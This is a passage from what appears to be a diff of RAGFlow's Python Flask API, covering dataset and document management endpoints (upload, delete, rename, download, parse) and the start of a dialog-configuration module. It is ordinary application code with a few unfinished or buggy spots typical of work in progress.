||||
# only if chunk_num is 0, the user can update the embedding id
|
||||
if req.get("embedding_model_id"):
|
||||
if chunk_num == 0:
|
||||
dataset_updating_data["embd_id"] = req["embedding_model_id"]
|
||||
else:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="You have already parsed the document in this "
|
||||
"dataset, so you cannot change the embedding "
|
||||
"model.")
|
||||
# only if chunk_num is 0, the user can update the chunk_method
|
||||
if "chunk_method" in req:
|
||||
type_value = req["chunk_method"]
|
||||
if is_illegal_value_for_enum(type_value, ParserType):
|
||||
return construct_json_result(message=f"Illegal value {type_value} for 'chunk_method' field.",
|
||||
code=RetCode.DATA_ERROR)
|
||||
if chunk_num != 0:
|
||||
construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document "
|
||||
"in this dataset, so you cannot "
|
||||
"change the chunk method.")
|
||||
dataset_updating_data["parser_id"] = req["template_type"]
|
||||
|
||||
# convert the photo parameter to avatar
|
||||
if req.get("photo"):
|
||||
dataset_updating_data["avatar"] = req["photo"]
|
||||
|
||||
# layout_recognize
|
||||
if "layout_recognize" in req:
|
||||
if "parser_config" not in dataset_updating_data:
|
||||
dataset_updating_data['parser_config'] = {}
|
||||
dataset_updating_data['parser_config']['layout_recognize'] = req['layout_recognize']
|
||||
|
||||
# TODO: updating use_raptor needs to construct a class
|
||||
|
||||
# 6 parameters
|
||||
for key in ["name", "language", "description", "permission", "id", "token_num"]:
|
||||
if key in req:
|
||||
dataset_updating_data[key] = req.get(key)
|
||||
|
||||
# update
|
||||
if not KnowledgebaseService.update_by_id(dataset.id, dataset_updating_data):
|
||||
return construct_json_result(code=RetCode.OPERATING_ERROR, message="Failed to update! "
|
||||
"Please check the status of RAGFlow "
|
||||
"server and try again!")
|
||||
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset.id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Failed to get the dataset "
|
||||
"using the dataset ID.")
|
||||
|
||||
return construct_json_result(data=dataset.to_json(), code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# --------------------------------content management ----------------------------------------------
|
||||
|
||||
# ----------------------------upload files-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/", methods=["POST"])
|
||||
@login_required
|
||||
def upload_documents(dataset_id):
|
||||
# no files
|
||||
if not request.files:
|
||||
return construct_json_result(
|
||||
message="There is no file!", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# the number of uploading files exceeds the limit
|
||||
file_objs = request.files.getlist("file")
|
||||
num_file_objs = len(file_objs)
|
||||
|
||||
if num_file_objs > MAXIMUM_OF_UPLOADING_FILES:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"You try to upload {num_file_objs} files, "
|
||||
f"which exceeds the maximum number of uploading files: {MAXIMUM_OF_UPLOADING_FILES}")
|
||||
|
||||
# no dataset
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(message="Can't find this dataset", code=RetCode.DATA_ERROR)
|
||||
|
||||
for file_obj in file_objs:
|
||||
file_name = file_obj.filename
|
||||
# no name
|
||||
if not file_name:
|
||||
return construct_json_result(
|
||||
message="There is a file without name!", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# TODO: support the remote files
|
||||
if 'http' in file_name:
|
||||
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message="Remote files have not unsupported.")
|
||||
|
||||
# get the root_folder
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
# get the id of the root_folder
|
||||
parent_file_id = root_folder["id"] # document id
|
||||
# this is for the new user, create '.knowledgebase' file
|
||||
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
|
||||
# go inside this folder, get the kb_root_folder
|
||||
kb_root_folder = FileService.get_kb_folder(current_user.id)
|
||||
# link the file management to the kb_folder
|
||||
kb_folder = FileService.new_a_file_from_kb(dataset.tenant_id, dataset.name, kb_root_folder["id"])
|
||||
|
||||
# grab all the errs
|
||||
err = []
|
||||
MAX_FILE_NUM_PER_USER = int(os.environ.get("MAX_FILE_NUM_PER_USER", 0))
|
||||
uploaded_docs_json = []
|
||||
for file in file_objs:
|
||||
try:
|
||||
# TODO: get this value from the database as some tenants have this limit while others don't
|
||||
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(dataset.tenant_id) >= MAX_FILE_NUM_PER_USER:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="Exceed the maximum file number of a free user!")
|
||||
# deal with the duplicate name
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=file.filename,
|
||||
kb_id=dataset.id)
|
||||
|
||||
# deal with the unsupported type
|
||||
filetype = filename_type(filename)
|
||||
if filetype == FileType.OTHER.value:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="This type of file has not been supported yet!")
|
||||
|
||||
# upload to the minio
|
||||
location = filename
|
||||
while STORAGE_IMPL.obj_exist(dataset_id, location):
|
||||
location += "_"
|
||||
|
||||
blob = file.read()
|
||||
|
||||
# the content is empty, raising a warning
|
||||
if blob == b'':
|
||||
warnings.warn(f"[WARNING]: The content of the file {filename} is empty.")
|
||||
|
||||
STORAGE_IMPL.put(dataset_id, location, blob)
|
||||
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
"kb_id": dataset.id,
|
||||
"parser_id": dataset.parser_id,
|
||||
"parser_config": dataset.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
"thumbnail": thumbnail(filename, blob)
|
||||
}
|
||||
if doc["type"] == FileType.VISUAL:
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if doc["type"] == FileType.AURAL:
|
||||
doc["parser_id"] = ParserType.AUDIO.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
DocumentService.insert(doc)
|
||||
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], dataset.tenant_id)
|
||||
uploaded_docs_json.append(doc)
|
||||
except Exception as e:
|
||||
err.append(file.filename + ": " + str(e))
|
||||
|
||||
if err:
|
||||
# return all the errors
|
||||
return construct_json_result(message="\n".join(err), code=RetCode.SERVER_ERROR)
|
||||
# success
|
||||
return construct_json_result(data=uploaded_docs_json, code=RetCode.SUCCESS)
|
||||
|
||||
|
||||
# ----------------------------delete a file-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["DELETE"])
|
||||
@login_required
|
||||
def delete_document(document_id, dataset_id): # string
|
||||
# get the root folder
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
# parent file's id
|
||||
parent_file_id = root_folder["id"]
|
||||
# consider the new user
|
||||
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
|
||||
# store all the errors that may have
|
||||
errors = ""
|
||||
try:
|
||||
# whether there is this document
|
||||
exist, doc = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"Document {document_id} not found!", code=RetCode.DATA_ERROR)
|
||||
# whether this doc is authorized by this tenant
|
||||
tenant_id = DocumentService.get_tenant_id(document_id)
|
||||
if not tenant_id:
|
||||
return construct_json_result(
|
||||
message=f"You cannot delete this document {document_id} due to the authorization"
|
||||
f" reason!", code=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
# get the doc's id and location
|
||||
real_dataset_id, location = File2DocumentService.get_minio_address(doc_id=document_id)
|
||||
|
||||
if real_dataset_id != dataset_id:
|
||||
return construct_json_result(message=f"The document {document_id} is not in the dataset: {dataset_id}, "
|
||||
f"but in the dataset: {real_dataset_id}.", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# there is an issue when removing
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return construct_json_result(
|
||||
message="There was an error during the document removal process. Please check the status of the "
|
||||
"RAGFlow server and try the removal again.", code=RetCode.OPERATING_ERROR)
|
||||
|
||||
# fetch the File2Document record associated with the provided document ID.
|
||||
file_to_doc = File2DocumentService.get_by_document_id(document_id)
|
||||
# delete the associated File record.
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == file_to_doc[0].file_id])
|
||||
# delete the File2Document record itself using the document ID. This removes the
|
||||
# association between the document and the file after the File record has been deleted.
|
||||
File2DocumentService.delete_by_document_id(document_id)
|
||||
|
||||
# delete it from minio
|
||||
STORAGE_IMPL.rm(dataset_id, location)
|
||||
except Exception as e:
|
||||
errors += str(e)
|
||||
if errors:
|
||||
return construct_json_result(data=False, message=errors, code=RetCode.SERVER_ERROR)
|
||||
|
||||
return construct_json_result(data=True, code=RetCode.SUCCESS)
|
||||
|
||||
|
||||
# ----------------------------list files-----------------------------------------------------
|
||||
@manager.route('/<dataset_id>/documents/', methods=['GET'])
|
||||
@login_required
|
||||
def list_documents(dataset_id):
|
||||
if not dataset_id:
|
||||
return construct_json_result(
|
||||
data=False, message="Lack of 'dataset_id'", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# searching keywords
|
||||
keywords = request.args.get("keywords", "")
|
||||
|
||||
offset = request.args.get("offset", 0)
|
||||
count = request.args.get("count", -1)
|
||||
order_by = request.args.get("order_by", "create_time")
|
||||
descend = request.args.get("descend", True)
|
||||
try:
|
||||
docs, total = DocumentService.list_documents_in_dataset(dataset_id, int(offset), int(count), order_by,
|
||||
descend, keywords)
|
||||
|
||||
return construct_json_result(data={"total": total, "docs": docs}, message=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# ----------------------------update: enable rename-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["PUT"])
|
||||
@login_required
|
||||
def update_document(dataset_id, document_id):
|
||||
req = request.json
|
||||
try:
|
||||
legal_parameters = set()
|
||||
legal_parameters.add("name")
|
||||
legal_parameters.add("enable")
|
||||
legal_parameters.add("template_type")
|
||||
|
||||
for key in req.keys():
|
||||
if key not in legal_parameters:
|
||||
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message=f"{key} is an illegal parameter.")
|
||||
|
||||
# The request body cannot be empty
|
||||
if not req:
|
||||
return construct_json_result(
|
||||
code=RetCode.DATA_ERROR,
|
||||
message="Please input at least one parameter that you want to update!")
|
||||
|
||||
# Check whether there is this dataset
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset {dataset_id} cannot be found!")
|
||||
|
||||
# The document does not exist
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document {document_id} cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# Deal with the different keys
|
||||
updating_data = {}
|
||||
if "name" in req:
|
||||
new_name = req["name"]
|
||||
updating_data["name"] = new_name
|
||||
# Check whether the new_name is suitable
|
||||
# 1. no name value
|
||||
if not new_name:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="There is no new name.")
|
||||
|
||||
# 2. In case that there's space in the head or the tail
|
||||
new_name = new_name.strip()
|
||||
|
||||
# 3. Check whether the new_name has the same extension of file as before
|
||||
if pathlib.Path(new_name.lower()).suffix != pathlib.Path(
|
||||
document.name.lower()).suffix:
|
||||
return construct_json_result(
|
||||
data=False,
|
||||
message="The extension of file cannot be changed",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# 4. Check whether the new name has already been occupied by other file
|
||||
for d in DocumentService.query(name=new_name, kb_id=document.kb_id):
|
||||
if d.name == new_name:
|
||||
return construct_json_result(
|
||||
message="Duplicated document name in the same dataset.",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
if "enable" in req:
|
||||
enable_value = req["enable"]
|
||||
if is_illegal_value_for_enum(enable_value, StatusEnum):
|
||||
return construct_json_result(message=f"Illegal value {enable_value} for 'enable' field.",
|
||||
code=RetCode.DATA_ERROR)
|
||||
updating_data["status"] = enable_value
|
||||
|
||||
# TODO: Chunk-method - update parameters inside the json object parser_config
|
||||
if "template_type" in req:
|
||||
type_value = req["template_type"]
|
||||
if is_illegal_value_for_enum(type_value, ParserType):
|
||||
return construct_json_result(message=f"Illegal value {type_value} for 'template_type' field.",
|
||||
code=RetCode.DATA_ERROR)
|
||||
updating_data["parser_id"] = req["template_type"]
|
||||
|
||||
# The process of updating
|
||||
if not DocumentService.update_by_id(document_id, updating_data):
|
||||
return construct_json_result(
|
||||
code=RetCode.OPERATING_ERROR,
|
||||
message="Failed to update document in the database! "
|
||||
"Please check the status of RAGFlow server and try again!")
|
||||
|
||||
# name part: file service
|
||||
if "name" in req:
|
||||
# Get file by document id
|
||||
file_information = File2DocumentService.get_by_document_id(document_id)
|
||||
if file_information:
|
||||
exist, file = FileService.get_by_id(file_information[0].file_id)
|
||||
FileService.update_by_id(file.id, {"name": req["name"]})
|
||||
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
|
||||
# Success
|
||||
return construct_json_result(data=document.to_json(), message="Success", code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# Helper method to judge whether it's an illegal value
|
||||
def is_illegal_value_for_enum(value, enum_class):
|
||||
return value not in enum_class.__members__.values()
|
||||
|
||||
|
||||
# ----------------------------download a file-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["GET"])
|
||||
@login_required
|
||||
def download_document(dataset_id, document_id):
|
||||
try:
|
||||
# Check whether there is this dataset
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"This dataset '{dataset_id}' cannot be found!")
|
||||
|
||||
# Check whether there is this document
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# The process of downloading
|
||||
doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id) # minio address
|
||||
file_stream = STORAGE_IMPL.get(doc_id, doc_location)
|
||||
if not file_stream:
|
||||
return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)
|
||||
|
||||
file = BytesIO(file_stream)
|
||||
|
||||
# Use send_file with a proper filename and MIME type
|
||||
return send_file(
|
||||
file,
|
||||
as_attachment=True,
|
||||
download_name=document.name,
|
||||
mimetype='application/octet-stream' # Set a default MIME type
|
||||
)
|
||||
|
||||
# Error
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# ----------------------------start parsing a document-----------------------------------------------------
|
||||
# helper method for parsing
|
||||
# callback method
|
||||
def doc_parse_callback(doc_id, prog=None, msg=""):
|
||||
cancel = DocumentService.do_cancel(doc_id)
|
||||
if cancel:
|
||||
raise Exception("The parsing process has been cancelled!")
|
||||
|
||||
"""
|
||||
def doc_parse(binary, doc_name, parser_name, tenant_id, doc_id):
|
||||
match parser_name:
|
||||
case "book":
|
||||
book.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "laws":
|
||||
laws.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "manual":
|
||||
manual.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "naive":
|
||||
# It's the mode by default, which is general in the front-end
|
||||
naive.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "one":
|
||||
one.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "paper":
|
||||
paper.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "picture":
|
||||
picture.chunk(doc_name, binary=binary, tenant_id=tenant_id, lang="Chinese",
|
||||
callback=partial(doc_parse_callback, doc_id))
|
||||
case "presentation":
|
||||
presentation.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "qa":
|
||||
qa.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "resume":
|
||||
resume.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "table":
|
||||
table.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "audio":
|
||||
audio.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case "email":
|
||||
email.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
|
||||
case _:
|
||||
return False
|
||||
|
||||
return True
|
||||
"""
|
||||
|
||||
|
||||
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["POST"])
|
||||
@login_required
|
||||
def parse_document(dataset_id, document_id):
|
||||
try:
|
||||
# valid dataset
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"This dataset '{dataset_id}' cannot be found!")
|
||||
|
||||
return parsing_document_internal(document_id)
|
||||
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# ----------------------------start parsing documents-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/status", methods=["POST"])
|
||||
@login_required
|
||||
def parse_documents(dataset_id):
|
||||
doc_ids = request.json["doc_ids"]
|
||||
try:
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"This dataset '{dataset_id}' cannot be found!")
|
||||
# two conditions
|
||||
if not doc_ids:
|
||||
# documents inside the dataset
|
||||
docs, total = DocumentService.list_documents_in_dataset(dataset_id, 0, -1, "create_time",
|
||||
True, "")
|
||||
doc_ids = [doc["id"] for doc in docs]
|
||||
|
||||
message = ""
|
||||
# for loop
|
||||
for id in doc_ids:
|
||||
res = parsing_document_internal(id)
|
||||
res_body = res.json
|
||||
if res_body["code"] == RetCode.SUCCESS:
|
||||
message += res_body["message"]
|
||||
else:
|
||||
return res
|
||||
return construct_json_result(data=True, code=RetCode.SUCCESS, message=message)
|
||||
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# helper method for parsing the document
|
||||
def parsing_document_internal(id):
|
||||
message = ""
|
||||
try:
|
||||
# Check whether there is this document
|
||||
exist, document = DocumentService.get_by_id(id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document '{id}' cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
tenant_id = DocumentService.get_tenant_id(id)
|
||||
if not tenant_id:
|
||||
return construct_json_result(message="Tenant not found!", code=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
info = {"run": "1", "progress": 0}
|
||||
info["progress_msg"] = ""
|
||||
info["chunk_num"] = 0
|
||||
info["token_num"] = 0
|
||||
|
||||
DocumentService.update_by_id(id, info)
|
||||
|
||||
ELASTICSEARCH.deleteByQuery(Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
_, doc_attributes = DocumentService.get_by_id(id)
|
||||
doc_attributes = doc_attributes.to_dict()
|
||||
doc_id = doc_attributes["id"]
|
||||
|
||||
bucket, doc_name = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
binary = STORAGE_IMPL.get(bucket, doc_name)
|
||||
parser_name = doc_attributes["parser_id"]
|
||||
if binary:
|
||||
res = doc_parse(binary, doc_name, parser_name, tenant_id, doc_id)
|
||||
if res is False:
|
||||
message += f"The parser id: {parser_name} of the document {doc_id} is not supported; "
|
||||
else:
|
||||
message += f"Empty data in the document: {doc_name}; "
|
||||
# failed in parsing
|
||||
if doc_attributes["status"] == TaskStatus.FAIL.value:
|
||||
message += f"Failed in parsing the document: {doc_id}; "
|
||||
return construct_json_result(code=RetCode.SUCCESS, message=message)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# ----------------------------stop parsing a doc-----------------------------------------------------
|
||||
@manager.route("<dataset_id>/documents/<document_id>/status", methods=["DELETE"])
|
||||
@login_required
|
||||
def stop_parsing_document(dataset_id, document_id):
|
||||
try:
|
||||
# valid dataset
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"This dataset '{dataset_id}' cannot be found!")
|
||||
|
||||
return stop_parsing_document_internal(document_id)
|
||||
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# ----------------------------stop parsing docs-----------------------------------------------------
|
||||
@manager.route("<dataset_id>/documents/status", methods=["DELETE"])
|
||||
@login_required
|
||||
def stop_parsing_documents(dataset_id):
|
||||
doc_ids = request.json["doc_ids"]
|
||||
try:
|
||||
# valid dataset?
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"This dataset '{dataset_id}' cannot be found!")
|
||||
if not doc_ids:
|
||||
# documents inside the dataset
|
||||
docs, total = DocumentService.list_documents_in_dataset(dataset_id, 0, -1, "create_time",
|
||||
True, "")
|
||||
doc_ids = [doc["id"] for doc in docs]
|
||||
|
||||
message = ""
|
||||
# for loop
|
||||
for id in doc_ids:
|
||||
res = stop_parsing_document_internal(id)
|
||||
res_body = res.json
|
||||
if res_body["code"] == RetCode.SUCCESS:
|
||||
message += res_body["message"]
|
||||
else:
|
||||
return res
|
||||
return construct_json_result(data=True, code=RetCode.SUCCESS, message=message)
|
||||
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# Helper method
|
||||
def stop_parsing_document_internal(document_id):
|
||||
try:
|
||||
# valid doc?
|
||||
exist, doc = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
doc_attributes = doc.to_dict()
|
||||
|
||||
# only when the status is parsing, we need to stop it
|
||||
if doc_attributes["status"] == TaskStatus.RUNNING.value:
|
||||
tenant_id = DocumentService.get_tenant_id(document_id)
|
||||
if not tenant_id:
|
||||
return construct_json_result(message="Tenant not found!", code=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
# update successfully?
|
||||
if not DocumentService.update_by_id(document_id, {"status": "2"}): # cancel
|
||||
return construct_json_result(
|
||||
code=RetCode.OPERATING_ERROR,
|
||||
message="There was an error during the stopping parsing the document process. "
|
||||
"Please check the status of the RAGFlow server and try the update again."
|
||||
)
|
||||
|
||||
_, doc_attributes = DocumentService.get_by_id(document_id)
|
||||
doc_attributes = doc_attributes.to_dict()
|
||||
|
||||
# failed in stop parsing
|
||||
if doc_attributes["status"] == TaskStatus.RUNNING.value:
|
||||
return construct_json_result(message=f"Failed in parsing the document: {document_id}; ", code=RetCode.SUCCESS)
|
||||
return construct_json_result(code=RetCode.SUCCESS, message="")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# ----------------------------show the status of the file-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["GET"])
|
||||
@login_required
|
||||
def show_parsing_status(dataset_id, document_id):
|
||||
try:
|
||||
# valid dataset
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"This dataset: '{dataset_id}' cannot be found!")
|
||||
# valid document
|
||||
exist, _ = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"This document: '{document_id}' is not a valid document.")
|
||||
|
||||
_, doc = DocumentService.get_by_id(document_id) # get doc object
|
||||
doc_attributes = doc.to_dict()
|
||||
|
||||
return construct_json_result(
|
||||
data={"progress": doc_attributes["progress"], "status": TaskStatus(doc_attributes["status"]).name},
|
||||
code=RetCode.SUCCESS
|
||||
)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ----------------------------list the chunks of the file-----------------------------------------------------
|
||||
|
||||
# -- --------------------------delete the chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------edit the status of the chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------insert a new chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------upload a file-----------------------------------------------------
|
||||
|
||||
# ----------------------------get a specific chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------retrieval test-----------------------------------------------------
|
||||
@ -1,164 +1,183 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.services.dialog_service import DialogService
|
||||
from api.db import StatusEnum
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.user_service import TenantService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@login_required
|
||||
def set_dialog():
|
||||
req = request.json
|
||||
dialog_id = req.get("dialog_id")
|
||||
name = req.get("name", "New Dialog")
|
||||
description = req.get("description", "A helpful Dialog")
|
||||
top_n = req.get("top_n", 6)
|
||||
similarity_threshold = req.get("similarity_threshold", 0.1)
|
||||
vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
|
||||
llm_setting = req.get("llm_setting", {})
|
||||
default_prompt = {
|
||||
"system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
|
||||
以下是知识库:
|
||||
{knowledge}
|
||||
以上是知识库。""",
|
||||
"prologue": "您好,我是您的助手小樱,长得可爱又善良,can I help you?",
|
||||
"parameters": [
|
||||
{"key": "knowledge", "optional": False}
|
||||
],
|
||||
"empty_response": "Sorry! 知识库中未找到相关内容!"
|
||||
}
|
||||
prompt_config = req.get("prompt_config", default_prompt)
|
||||
|
||||
if not prompt_config["system"]:
|
||||
prompt_config["system"] = default_prompt["system"]
|
||||
# if len(prompt_config["parameters"]) < 1:
|
||||
# prompt_config["parameters"] = default_prompt["parameters"]
|
||||
# for p in prompt_config["parameters"]:
|
||||
# if p["key"] == "knowledge":break
|
||||
# else: prompt_config["parameters"].append(default_prompt["parameters"][0])
|
||||
|
||||
for p in prompt_config["parameters"]:
|
||||
if p["optional"]:
|
||||
continue
|
||||
if prompt_config["system"].find("{%s}" % p["key"]) < 0:
|
||||
return get_data_error_result(
|
||||
retmsg="Parameter '{}' is not used".format(p["key"]))
|
||||
|
||||
try:
|
||||
e, tenant = TenantService.get_by_id(current_user.id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
llm_id = req.get("llm_id", tenant.llm_id)
|
||||
if not dialog_id:
|
||||
if not req.get("kb_ids"):
|
||||
return get_data_error_result(
|
||||
retmsg="Fail! Please select knowledgebase!")
|
||||
dia = {
|
||||
"id": get_uuid(),
|
||||
"tenant_id": current_user.id,
|
||||
"name": name,
|
||||
"kb_ids": req["kb_ids"],
|
||||
"description": description,
|
||||
"llm_id": llm_id,
|
||||
"llm_setting": llm_setting,
|
||||
"prompt_config": prompt_config,
|
||||
"top_n": top_n,
|
||||
"similarity_threshold": similarity_threshold,
|
||||
"vector_similarity_weight": vector_similarity_weight
|
||||
}
|
||||
if not DialogService.save(**dia):
|
||||
return get_data_error_result(retmsg="Fail to new a dialog!")
|
||||
e, dia = DialogService.get_by_id(dia["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to new a dialog!")
|
||||
return get_json_result(data=dia.to_json())
|
||||
else:
|
||||
del req["dialog_id"]
|
||||
if "kb_names" in req:
|
||||
del req["kb_names"]
|
||||
if not DialogService.update_by_id(dialog_id, req):
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
e, dia = DialogService.get_by_id(dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to update a dialog!")
|
||||
dia = dia.to_dict()
|
||||
dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
|
||||
return get_json_result(data=dia)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@login_required
|
||||
def get():
|
||||
dialog_id = request.args["dialog_id"]
|
||||
try:
|
||||
e, dia = DialogService.get_by_id(dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
dia = dia.to_dict()
|
||||
dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
|
||||
